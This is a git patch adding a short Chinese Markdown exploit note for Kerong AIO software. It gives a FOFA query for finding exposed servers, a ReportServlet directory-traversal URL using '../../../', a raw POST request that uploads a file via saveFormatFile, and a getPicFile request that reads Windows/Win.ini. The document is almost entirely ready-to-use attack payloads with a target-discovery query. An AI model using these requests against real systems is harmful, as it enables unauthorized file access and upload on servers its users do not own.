From 6f3f384d1f26ba6f01be87aa8960822f50e47591 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 27 Dec 2023 20:18:53 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E7=A7=91=E8=8D=A3=20AIO=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0-=E7=9B=AE?=
 =?UTF-8?q?=E5=BD=95=E9=81=8D=E5=8E=86-=E4=BB=BB=E6=84=8F=E6=96=87?=
 =?UTF-8?q?=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...AIO任意文件上传-目录遍历-任意文件读取漏洞.md | 26 +++++++++++++++++++
 1 file changed, 26 insertions(+)
 create mode 100644 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md

diff --git a/科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md b/科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md
new file mode 100644
index 0000000..72b4b32
--- /dev/null
+++ b/科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞.md	
@@ -0,0 +1,26 @@
+## 科荣 AIO任意文件上传-目录遍历-任意文件读取漏洞
+
+## fofa
+```
+body="changeAccount('8000')"
+```
+## 目录遍历
+```
+http://xxxxxx/ReportServlet?operation=getFileList&path=../../../
+```
+
+## 文件上传
+```
+POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1
+Host: xxxxxx
+Connection: lose
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 2
+
+demo
+```
+
+## 任意文件读取
+```
+http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini
+```